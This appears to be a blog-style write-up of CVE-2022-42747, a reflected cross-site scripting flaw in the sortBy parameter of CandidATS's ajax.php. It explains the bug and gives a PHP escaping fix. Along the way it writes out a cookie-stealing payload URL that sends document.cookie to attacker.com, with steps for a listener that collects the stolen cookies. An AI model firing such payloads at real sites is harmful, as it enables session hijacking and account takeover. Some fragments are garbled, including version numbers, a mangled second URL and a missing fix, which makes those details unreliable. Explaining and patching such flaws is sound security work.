CVE-2022-42747 is a security vulnerability in CandidATS, an open source applicant tracking system, version 3... The problem? It fails to properly validate some user-supplied data in a way that lets an attacker insert malicious JavaScript into the system and potentially steal user cookies — including those of admin users. That means hackers can take over accounts on affected CandidATS deployments.
This post will break down how the flaw works, how to reproduce it, what code is vulnerable, and what you can do to defend yourself.
The Details: Where’s the Problem?
The dangerous bug is found in the AJAX endpoint ajax.php, specifically in how it handles the sortBy parameter on some requests. There is no input sanitization (filtering bad HTML or JavaScript) on the received value, opening the door for cross-site scripting (XSS) attacks.
A GET or POST parameter named sortBy is processed without checking its contents.
- Whatever you send as sortBy may get reflected back into the page, and so any JavaScript you sneak in there will be executed in the browser of anyone who loads that page.
Exploit Example: How Does an Attack Work?
Let’s say a malicious user finds your CandidATS 3.. install at https://company.com/candidats/.
Now imagine they have this evil link
https://company.com/candidats/ajax.php?sortBy=%3Cscript%3Efetch('https://attacker.com/steal?c='+document.cookie)%3C/script%3E
That %3Cscript%3E...%3C/script%3E encodes <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>, which will run in anyone’s browser who accesses the page with this link.
If an authenticated user (for example, an admin) simply clicks on the crafted link or browses to a manipulated page, their session cookie is silently sent to the attacker’s server. That’s game over: the attacker can hijack valid user sessions!
Set Up a CandidATS 3.. Instance:
Download from CandidATS GitHub and install locally or on a test server.
Create a Listener for Stolen Cookies:
On your server, make an endpoint that logs requests, e.g., on https://attacker.com/steal.
`plaintext
https://your-candidats.com/ajax.php?sortBy=fetch('<a href="https://attacker.com/steal?c='+document.cookie" rel="nofollow">https://attacker.com/steal?c='+document.cookie</a>)
Inside ajax.php, you’ll see something like
$sortBy = $_GET['sortBy']; // Or $_POST['sortBy']
// ...
// Later, sortBy is echoed out in raw form in an HTML context
echo "<div>Sort by: $sortBy</div>";
No htmlspecialchars or filtering — that means if sortBy contains HTML tags, the browser renders them.
Original References
- NIST NVD Page for CVE-2022-42747
- Exploit Database - CandidATS 3.. Reflected XSS
- CandidATS GitHub
To fix this, always sanitize outputs! In PHP, use
echo "<div>Sort by: ".htmlspecialchars($sortBy, ENT_QUOTES, 'UTF-8')."</div>";
Or, better:
Conclusion
CVE-2022-42747 is a textbook example of what happens when web apps skip proper checks on user input. Attackers can exploit this XSS to *steal cookies*, *hijack sessions*, and *take over sensitive accounts* with shocking ease.
Stay safe. Audit your code, patch critical web apps, and remember:
“Never trust input that comes from the web.”
*For more on XSS and secure coding, visit OWASP XSS Cheatsheet and subscribe for more vulnerability write-ups!*
Timeline
Published on: 11/03/2022 20:15:00 UTC
Last modified on: 01/26/2023 20:20:00 UTC